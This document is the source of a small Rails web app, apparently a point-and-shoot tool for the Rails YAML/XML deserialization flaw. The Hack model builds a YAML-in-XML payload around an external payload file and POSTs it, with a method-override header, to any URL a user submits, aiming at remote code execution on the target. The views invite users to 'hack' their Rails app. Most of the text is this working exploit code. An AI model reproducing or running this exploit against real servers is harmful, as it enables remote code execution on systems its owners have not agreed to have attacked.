config/routes.rb
Takeit::Application.routes.draw do

  resources :hacks

  root to: 'hacks#index'

end

app/models/hack.rb
require 'net/http'
require 'uri'
class Hack

  attr_accessor :url, :payload

  def initialize(url)
    self.url = url
    self.payload = File.read("#{Rails.root}/payload.rb")
  end

  def url_valid?
    url.present? && url =~ URI::regexp
  end

  def drop_mah_payload!
    Timeout::timeout(5) {
      res  = exploit
      Rails.logger.info res.inspect
      Rails.logger.info res.body.inspect
      res.code.to_s == "200"
    }
  rescue Timeout::Error
    Rails.logger.info "TIMEOUT"
    false
  end


  def escape_payload(payload)
    "foo\n#{payload}\n__END__\n"
  end

  def wrap_payload(payload)
    "(#{payload}; @executed = true) unless @executed"
  end

  def exploit
    escaped_payload = escape_payload(wrap_payload(payload))
    encoded_payload = escaped_payload.to_yaml.sub('--- ','').chomp

yaml = %{
--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
? #{encoded_payload}
: !ruby/struct
  defaults:
    :action: create
    :controller: foos
  required_parts: []
  requirements:
    :action: create
    :controller: foos
  segment_keys:
    - :format
}.strip

xml = %{
<?xml version="1.0" encoding="UTF-8"?>
<exploit type="yaml">#{CGI.escape_html yaml}</exploit>
}.strip


    uri = URI.parse(url)
    http = Net::HTTP.new(uri.host, uri.port)

    request = Net::HTTP::Post.new(uri.request_uri)
    request.body = xml
    request["X-HTTP-METHOD-OVERRIDE"] = 'get'
    request["Content-Type"] = "text/xml"

    response = http.request(request)
  end

end

app/controllers/application_controller.rb
class ApplicationController < ActionController::Base
  protect_from_forgery
end

app/controllers/hacks_controller.rb
class HacksController < ApplicationController

  def index
  end

  def create
    hack = Hack.new(params[:url])

    if hack.url_valid?
      if hack.drop_mah_payload!
        flash.now[:notice] = "Aw right, done."
      else
        flash.now[:error] =  "Sorry can't do."
      end
    else
      flash.now[:error] =  "Invalid url..."
    end

    render :index
  end

end

app/helpers/application_helper.rb
module ApplicationHelper
end

app/views/application/_alerts.html.haml
- if flash[:error]
  %h1.red
    = flash[:error]
- if flash[:notice]
  %h1.green
    = flash[:notice]

app/views/layouts/application.html.haml
!!! 5
%html(lang="en")
  %head
    %meta(charset="utf-8")
    %meta(name="viewport" content="width=device-width, initial-scale=1.0")
    %link{href: 'http://fonts.googleapis.com/css?family=Source+Sans+Pro|Source+Code+Pro|Yanone+Kaffeesatz', rel: 'stylesheet', type: 'text/css'}
    %title Own my rails please!
    = csrf_meta_tags
    = stylesheet_link_tag "application"
    = javascript_include_tag "application"

  %body

    .container.hakz
      .row
        - if flash.keys.size.zero?
          %h1
            %p Hack mah rails.
            %small.quiet Please. Now.
        - else
          = render 'alerts'
        %p My rails are here:
        = form_tag hacks_path do
          = text_field_tag "url", params[:url], class: 'input-xxlarge', placeholder: 'enter your rails application url...'
          = button_tag type: 'submit', class: 'btn' do
            %i.icon-gift.icon-spin
            hack em naaaw!

    %footer
      By #{link_to 'madsheep', 'http://madsheep.pl' } from #{link_to 'netguru.co', 'http://netguru.co' }